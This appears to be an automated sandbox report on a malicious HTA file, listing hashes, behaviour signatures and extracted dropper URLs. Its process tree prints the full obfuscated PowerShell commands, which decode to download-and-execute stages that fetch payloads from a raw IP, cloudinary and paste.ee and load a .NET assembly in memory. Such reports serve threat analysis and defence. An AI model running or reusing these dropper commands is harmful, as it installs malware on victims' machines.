Analysis

  • max time kernel
    14s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    17-12-2024 04:17

General

  • Target

    af6c6b710e9a4c5e2d8b53642779548a4edcd528cd7e5714c6ac9d69f38efb80.hta

  • Size

    144KB

  • MD5

    5215d83b478d7a718062863c5efbbeeb

  • SHA1

    9ac735295a8b3bc10740d50669f6fa5c81ae10ce

  • SHA256

    af6c6b710e9a4c5e2d8b53642779548a4edcd528cd7e5714c6ac9d69f38efb80

  • SHA512

    b1ea72019653fa7858aa1b6ad1fa3fcf6974ade703be0edd55f891030706fc675425e5f1372dc3a61671dff5e40e6baceba019af60711cd65a248f7cecbca915

  • SSDEEP

    768:t1EZFxaTOum2oum2M5KUJDVUKhCbGVf/AMF9woN83WkkA7MhrkK0IHj66666666l:tg

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg%20

exe.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg%20

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Evasion via Device Credential Deployment 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\af6c6b710e9a4c5e2d8b53642779548a4edcd528cd7e5714c6ac9d69f38efb80.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2580
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1248
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2484
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cdxqt52k.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3016
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7E16.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7E15.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2972
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2184
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $panton = 'JHRvc2luZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R6dmFpODZ1aC9pbWFnZS91cGxvYWQvdjE3MzQzMTUyNDQvbTNndGJxa3R2bm9jeXZtNDEwYWEuanBnICc7JGNhbHljZXMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRjeW1iYWwgPSAkY2FseWNlcy5Eb3dubG9hZERhdGEoJHRvc2luZXNzKTskYm9hcnRzID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGN5bWJhbCk7JG1pc3RlbXBlciA9ICc8PEJBU0U2NF9TVEFSVD4+JzskbGluZ3VsaWZlcm91cyA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyaWNoaW5lbGxvc2lzID0gJGJvYXJ0cy5JbmRleE9mKCRtaXN0ZW1wZXIpOyRzdWJ0b3JyaWQgPSAkYm9hcnRzLkluZGV4T2YoJGxpbmd1bGlmZXJvdXMpOyR0cmljaGluZWxsb3NpcyAtZ2UgMCAtYW5kICRzdWJ0b3JyaWQgLWd0ICR0cmljaGluZWxsb3NpczskdHJpY2hpbmVsbG9zaXMgKz0gJG1pc3RlbXBlci5MZW5ndGg7JGludGVyc3RpdGlhID0gJHN1YnRvcnJpZCAtICR0cmljaGluZWxsb3Npczskc2hhaWsgPSAkYm9hcnRzLlN1YnN0cmluZygkdHJpY2hpbmVsbG9zaXMsICRpbnRlcnN0aXRpYSk7JHZpbnlsYmVuemVuZSA9IC1qb2luICgkc2hhaWsuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHNoYWlrLkxlbmd0aCldOyRtZWxpcGhhZ2lkYW4gPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2aW55bGJlbnplbmUpOyRvcm9nZW4gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRtZWxpcGhhZ2lkYW4pOyRtZWFzbHkgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskbWVhc2x5Lkludm9rZSgkbnVsbCwgQCgnMC9CTWRnVC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHBhcnZhbmltaXR5JywgJyRwYXJ2YW5pbWl0eScsICckcGFydmFuaW1pdHknLCAnQ2FzUG9sJywgJyRwYXJ2YW5pbWl0eScsICckcGFydmFuaW1pdHknLCckcGFydmFuaW1pdHknLCckcGFydmFuaW1pdHknLCckcGFydmFuaW1pdHknLCckcGFydmFuaW1pdHknLCckcGFydmFuaW1pdHknLCcxJywnJHBhcnZhbmltaXR5JywnVGFza05hbWUnKSk7';$stratagemical = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($panton));Invoke-Expression $stratagemical
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2004

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Cab97FD.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RES7E16.tmp

    Filesize

    1KB

    MD5

    0bd6d56a74be8a19f055a05a6e923baa

    SHA1

    6c9c1fcd77398ba4b761627f2a8c3faff21f6817

    SHA256

    595844ac757a097ad48239062b7c42969af4ec38ee3e49874673bf2a4080791b

    SHA512

    4bb317b99b2b0f26e822a01a779f3f982387177f2d480a619c7d87201e8969ebad74ae8fcc9d7f58fcbf8ea2adb64afa5370dbbc103cc8b6800945e1ba860c2b

  • C:\Users\Admin\AppData\Local\Temp\Tar9820.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\cdxqt52k.dll

    Filesize

    3KB

    MD5

    58b628c177a7896b91ed182ebaa35469

    SHA1

    88aa416a1c51152be5437584ada6ab43e1e6237a

    SHA256

    50f54d6cbb0fb503043398de98e5ed85872c39f4911cdca4dbbfaf0e87f9d008

    SHA512

    f06fea6277996229d17b1efb1bce1ad859a981ac1ad5937f4565351170385b988310008c06eb5aa70e199c05ed9daaf07a180b7767703e111087c0da8a55d96a

  • C:\Users\Admin\AppData\Local\Temp\cdxqt52k.pdb

    Filesize

    7KB

    MD5

    58075fb9c0311fd8b88827ae5d3e1f2e

    SHA1

    fa7ed76114514c565fb0704e1ed8659f0fdb7044

    SHA256

    9e5cf2d94bd482b15b99a780e921034d0ed54c98f7fdb5458f122075f5c21403

    SHA512

    fcc4edc913c85195622e36d3c8bc806d86b0b15869deda5d3ce23e3a8123fdd15b364876c8a4e29b565af1b7e44123982fc4afedc5ffc90e20026e3e0b8e233e

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    1437f322d41709a34f7b3968918c4c10

    SHA1

    2e97393fcafec491d714edd5cbe1cde30f3fbb62

    SHA256

    88ad614931792740e7ef560f45233280e23b30875e3f5d8b90f9e451d2549015

    SHA512

    537f8f579fea393a58da98967da8ecbd71ad7383ad298a256041f12bff9f4c8a995821ebb42dcb0341f90527129558e41b31072ad8a40951bf37686e5c589100

  • C:\Users\Admin\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS

    Filesize

    150KB

    MD5

    7a539179ea126613a4c2c9d1bee31c52

    SHA1

    11d431b7c5b338835fe64d754d04c6d9c10e793a

    SHA256

    744148cb1c99cde05d4e16839fc8bf5a661dc6072209aaaf19250b64899e5189

    SHA512

    a6e807f4e03115a7f6b000464f042ce1d4a5e55c24515b6f526f36ba54d49202dcbbd67f2a16295ff2ffc62f855463a905c5d670aed70483f032f168b91f096c

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC7E15.tmp

    Filesize

    652B

    MD5

    26bc20a577158b89c1fb5321826ff034

    SHA1

    3730cc0493318f5344391bb58b293b26dce3f26e

    SHA256

    eedbb4cb1295cfbbc6c9b2cdea6b82289fd51494102204491203e15e2d313299

    SHA512

    6d5fd02c371a6fc47fd0d3d1a97106ac15b31b3af6840cbf571c9ea2036ac6e54e90f73ab76bfceb1e13d4b5297471bebbeb66643de98f6f512d9759648364f4

  • \??\c:\Users\Admin\AppData\Local\Temp\cdxqt52k.0.cs

    Filesize

    475B

    MD5

    0c431e10cf228fe2c475697b04ff0ebb

    SHA1

    04439e5d97e5c2e03f57caf24564925b32d644cb

    SHA256

    f0514c83d3a0460e90e267fbb96546f4b5890906eb7ea94799c38ec743fb91ae

    SHA512

    954a57476daa5408f0ff679972741e63e8fe61ff20bdefc40b83ad6ff633b0a7d5d3ddce7cfaff0a5ff0bc2300704f6c5639adbf44f38a818d22644814e5efcb

  • \??\c:\Users\Admin\AppData\Local\Temp\cdxqt52k.cmdline

    Filesize

    309B

    MD5

    305e97ac13e0575681e49ec13fa60ddb

    SHA1

    1087a816e6d01e115858a618044eada777a21587

    SHA256

    93cff63f2e354762c1e5e3c69146e7cfc19c8d03102b7556dfa7bff0ce2955c5

    SHA512

    9c7a7fd1441c33485ecb952f016aa91ea579fce891fcad87b5577373ef481d6a1d59aa0a689cdbc4fea966e5b893dd6b5d4f0269cb00da77d69f9a9a31da79f4